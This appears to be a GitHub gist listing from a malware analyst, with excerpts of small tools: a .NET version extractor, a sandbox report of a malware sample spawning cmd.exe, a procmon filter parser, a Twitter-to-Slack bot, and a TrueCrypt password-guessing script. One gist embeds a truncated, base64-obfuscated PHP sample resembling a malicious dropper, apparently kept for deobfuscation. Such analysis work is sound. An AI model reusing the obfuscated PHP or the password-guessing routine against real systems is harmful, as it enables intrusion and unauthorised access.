This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def get_NET_version(data): | |
""" | |
Code to extract .NET compiled version. | |
typedef struct t_MetaData_Header { | |
DWORD Signature; // BSJB | |
WORD MajorVersion; | |
WORD MinorVersion; | |
DWORD Unknown1; | |
DWORD VersionSize; | |
PBYTE VersionString; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Keybase proof | |
I hereby claim: | |
* I am Rurik on github. | |
* I am bbaskin (https://keybase.io/bbaskin) on keybase. | |
* I have a public key whose fingerprint is AFD8 C071 A2CE E394 D226 4F19 8732 1B4E 326D FD20 | |
To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Based on WMI code from http://mail.python.org/pipermail/python-win32/2006-March/004340.html | |
import os | |
def process_running(procname): | |
def find_pid(processname): | |
import win32com.client | |
for proc in win32com.client.GetObject('winmgmts:').InstancesOf('win32_process'): | |
if proc.Name.upper() == processname.upper(): | |
return proc.Properties_('ProcessId') | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import subprocess | |
tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe" | |
tc_file = "E:\\test.tlc" | |
drive_letter = "P" | |
def leet_lookup(char): | |
list = {"a": ["a","A","@"], | |
"b": ["b", "B", "8"], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
import sys | |
from PyQt4.QtCore import * | |
from PyQt4.QtGui import * | |
import base64 | |
def main(): | |
app = QApplication(sys.argv) | |
w = MyWindow() | |
w.show() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-=] Sandbox Analysis Report generated by Noriben v1.7.0 | |
-=] Developed by Brian Baskin: brian @@ thebaskins.com @bbaskin | |
-=] The latest release can be found at https://github.com/Rurik/Noriben | |
-=] Analysis time: 61.84 seconds | |
Processes Created: | |
================== | |
[CreateProcess] python.exe:2420 > "C:\malware\hehda.exe" [Child PID: 1764] | |
[CreateProcess] hehda.exe:1764 > "%WinDir%\system32\cmd.exe" [Child PID: 692] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
### Tracks a public Twitter List and posts updates to a given Slack channel | |
### Example: https://i.imgur.com/RMQB27N.png | |
import datetime | |
import time | |
import twitter | |
from slackclient import SlackClient | |
slack_bot_id = '<FILL OUT>' | |
slack_channel = '<FILL OUT>' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CLASSES_ROOT\AllFilesystemObjects\shell\Command Prompt Here\command] | |
@="cmd.exe /k cd \"%L\"" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import base64 | |
script = """ | |
<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy' .'b' .'3JfcmVw' .'b' .'3J0aW5n'),base64_decode('c' .'2V0X3RpbWV' .'fbGl' .'taXQ' .'='),base64_decode('' .'ZG' .'Vma' .'W' .'5l'),base64_decode('' .'ZGlyb' .'mFtZQ=='),base64_decode('ZGVm' .'aW5l'),base64_decode('' .'d' .'W5saW5r'),base64_decode('Zml' .'sZ' .'V9le' .'G' .'lzdHM='),base64_decode('dG91Y2' .'g='),base64_decode('aXNfd3J' .'p' .'dGFibGU='),base64_decode('dHJ' .'p' .'bQ=='),base64_decode('ZmlsZ' .'V9nZXRf' .'Y29udGVud' .'HM='),base64_decode('dW5s' .'aW5r'),base64_decode('Zm' .'lsZ' .'V9nZXRf' .'Y2' .'9u' .'dGVudHM='),base64_decode('d' .'W5' .'saW5r'),base64_decode('cH' .'JlZ19' .'tYX' .'Rj' .'aA=='),base64_decode('aW1wb' .'G9kZ' .'Q=='),base64_decode('cHJlZ19t' .'YXRja' .'A=='),base64_decode('a' .'W1w' .'bG9k' .'Z' .'Q=='),base64_decode('Zml' .'s' .'ZV' .'9nZXRfY' .'29' .'udGV' .'udH' .'M='),base64_decode('Z' .'m9w' .'ZW4='),base64_decode('' .'ZmxvY' .'2' .'s' .'='),base64_decode('ZnB1' .'dH' .'M='),base64_decode('Zmx' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Procmon Rule Parser v0.02 | |
# Brian Baskin - @bbaskin | |
# Reads default rules from an exported Procmon Configuration (.PMC) or Procmon Filter (.PMF) file | |
# Example output: | |
""" | |
12:09:59-bbaskin@~/Development/Noriben$ python parse_procmon_filters.py -f ProcmonConfiguration.pmc | |
[Exclude] Process Name is Procmon64.exe | |
[Exclude] Operation is QueryStandardInformationFile | |
[Exclude] Operation is RegOpenKey | |
[Exclude] Operation is NotifyChangeDirectory |
OlderNewer